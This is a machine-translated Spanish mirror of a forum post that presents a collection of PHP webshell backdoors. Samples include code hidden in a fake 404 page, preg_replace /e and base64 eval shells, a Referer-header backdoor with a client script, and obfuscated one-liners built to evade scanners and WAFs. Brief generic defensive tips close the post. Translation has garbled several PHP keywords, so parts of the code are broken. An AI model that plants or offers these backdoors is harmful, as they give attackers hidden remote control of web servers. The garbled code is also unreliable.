Este artículo es un artículo espejo de traducción automática, por favor haga clic aquí para saltar al artículo original.

Vista: 7260|Respuesta: 0

[Comunicación segura] Soluciona esas potentes puertas traseras de PHP

[Copiar enlace]
Publicado en 1/12/2014 21:41:13 | | |
Tratamos estos programas de backdoor PHP con mentalidad de aprendizaje, y mucho código backdoor de PHP nos permite ver lo bien intencionados que son los programadores.
Puerta trasera poderosa de PHP en una sola frase
Este tipo de puerta trasera permite que sitios web,Los administradores de servidores son muy problemáticos y a menudo tienen que cambiar métodos para realizar diversas detecciones, y muchas técnicas nuevas de escritura no pueden descubrirse ni abordarse con métodos de detección ordinarios.
Hoy vamos a contar algunos troyanos PHP interesantes.
1. Oculta ponis PHP usando 404 páginas:
[mw_shl_code=php,true] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 No encontrado</title>
</head><body>
<h1>No encontrado</h1>
<p>La URL solicitada no se encontró en este servidor.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
encabezado ('HTTP/1.1 404 No encontrado');
?>[/mw_shl_code]
La página 404 es un archivo de uso común en la web, y pocas personas lo revisan y modifican después de que generalmente se recomienda, así que podemos usarlo para ocultar la puerta trasera.

2. PHP oculto sin características en una frase:
[mw_shl_code=php,true]<?php
session_start();
$_POST['código'] && $_SESSION['elCódigo'] = trim($_POST['código']);
$_SESSION['theCode']&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'elCódigo\'])','a');
?>[/mw_shl_code]
Asigna $_POST['código'] a $_SESSION['elCódigo'], y luego ejecuta $_SESSION['elCódigo'], destacando que no hay código de firma.
Si usas una herramienta de escaneo para comprobar el código, no se activará la alarma y no alcanzará el objetivo.

3. Puerta trasera súper sigilosa en PHP:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
La función GET por sí sola constituye un troyano;
Cómo usar:
[mw_shl_code=php,true]        
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Tras la ejecución, el directorio actual genera c.php un troyano de oración; cuando el parámetro A está evaluado, la generación de troyanos de error falló, y cuando se aserta, también informará de un error, pero generará un caballo de Troya, que no puede subestimarse.
Solicitud de nivel, código para ejecutar la puerta trasera de PHP:
Este método se implementa con dos archivos, archivo 1
[mw_shl_code=php,true]<?php
//1.php
encabezado('Content-type:text/html; charset=UTF-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implosiona(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Documento 2
[mw_shl_code=php,true]<?php
//2.php
encabezado('Content-type:text/html; charset=UTF-8′);
//要执行的代码
$code= <<<CÓDIGO
phpinfo();
CÓDIGO;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= array(
CURLOPT_URL => $url,
CURLOPT_HEADER => FALSO,
CURLOPT_RETURNTRANSFER => CIERTO,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Ejecuta código codificado en base64 a través del HTTP_REFERER en la petición HTTP para lograr el efecto backdoor.
Es bueno usar esta idea para saltarse el waf.
4.PHP herramienta de generador de puerta trasera
weevely es una versión específica de PHPEl software gratuito Webshell puede usarse para simular un shell de conexión similar al telnet, Weevely suele usarse para explotar programas web, ocultar puertas traseras o usar métodos similares a telnet en lugar de la gestión basada en páginas web, el código PHP del lado del servidor generado por Weevely está codificado en base64, por lo que puede engañar al software antivirus y al IDS convencional. Una vez que subes el código del lado del servidor, normalmente puedes ejecutarlo directamente a través de Weevely.
Las funciones utilizadas en la puerta trasera son funciones de procesamiento de cadenas comúnmente usadas, y las funciones como eval y system que se usan como reglas de inspección no aparecerán directamente en el código, por lo que el archivo de la puerta trasera puede saltarse la comprobación de la herramienta de búsqueda de la puerta trasera. Escanear con la herramienta de detección de puertas traseras web del grupo oscuro muestra que el archivo no está amenazado.
Lo anterior es una introducción general, y los métodos de uso relevantes no se presentan aquí, es una simple divulgación científica.
4. Tres troyanos PHP deformados de una sola frase
      La primera:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
La segunda
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__'];?>[/mw_shl_code]
Escribe http://site/2.php?_=assert&__=eval($_POST['pas']) en el cuchillo de cocina es paso.
Si usas los datos adicionales del cuchillo de cocina, queda más oculto, o puedes usar otras herramientas de inyección, porque se ha enviado después de enviarlo.
El tercero
[mw_shl_code=php,true] ($b 4dboy= $_POST['b4dboy']) & @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'añadir'); [/mw_shl_code]
str_rot13 ('riny') es la evaluación codificada, que evita por completo las palabras clave sin perder el efecto, ¡haciendo que la gente vomite sangre!
5. Por último, enumera algunas puertas traseras avanzadas de troyanos PHP:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Acceso"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
incluye($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MiArchivo][tmp_name],$_FILES[MiArchivo][nombre]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Acceso"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
En resumen, estas puertas traseras PHP pueden considerarse completas; si no tienes cuidado, seguro que te engañarán, ¿y cuál es la máxima prioridad de nuestro artículo hoy? ¡Los puntos clave están en el resumen de abajo!
Cómo lidiar con la puerta de atrás de una frase en PHP:
Enfatizamos algunos puntos clave, y si lees este artículo, creo que no eres un profano, así que no me extenderé:
  • Ten en cuenta la seguridad al escribir programas PHP
  • Los archivos de registro del servidor deben leerse con frecuencia y hacer copias de seguridad con frecuencia
  • Asignación estricta de permisos para cada sitio
  • Revisiones frecuentes de seguridad por lotes de archivos y directorios dinámicos
  • Aprende a llevar a cabo un antivirus manual "Juicio Conductual Investigación y Eliminación"
  • Permanece atento o infiltra un campamento activo de ciberseguridad
  • Incluso una función puede usarse como regla para el procesamiento jerárquico del entorno del servidor
Creemos que cuando haya más sitios que gestionar y una gran cantidad de datos, deberíamos aplicar razonablemente algunas herramientas auxiliares, pero no depender completamente de ellas; la tecnología está siempre actualizándose y mejorando, lo más importante es que aprendas y entiendas el pensamiento de escribir a estas poderosas personas de la puerta trasera, y la transposición de roles puede traerte un mayor progreso.





Anterior:Firefox Plugins El Firefox Hacking Plugin convierte Firefox en una herramienta de hacking con siete plugins
Próximo:MS12-020 3389 0day exp Código de ejecución de escritorio remoto código fuente en python
Renuncia:
Todo el software, materiales de programación o artículos publicados por Code Farmer Network son únicamente para fines de aprendizaje e investigación; El contenido anterior no se utilizará con fines comerciales o ilegales; de lo contrario, los usuarios asumirán todas las consecuencias. La información de este sitio proviene de Internet, y las disputas de derechos de autor no tienen nada que ver con este sitio. Debes eliminar completamente el contenido anterior de tu ordenador en un plazo de 24 horas desde la descarga. Si te gusta el programa, por favor apoya el software genuino, compra el registro y obtén mejores servicios genuinos. Si hay alguna infracción, por favor contáctanos por correo electrónico.

Mail To:help@itsvse.com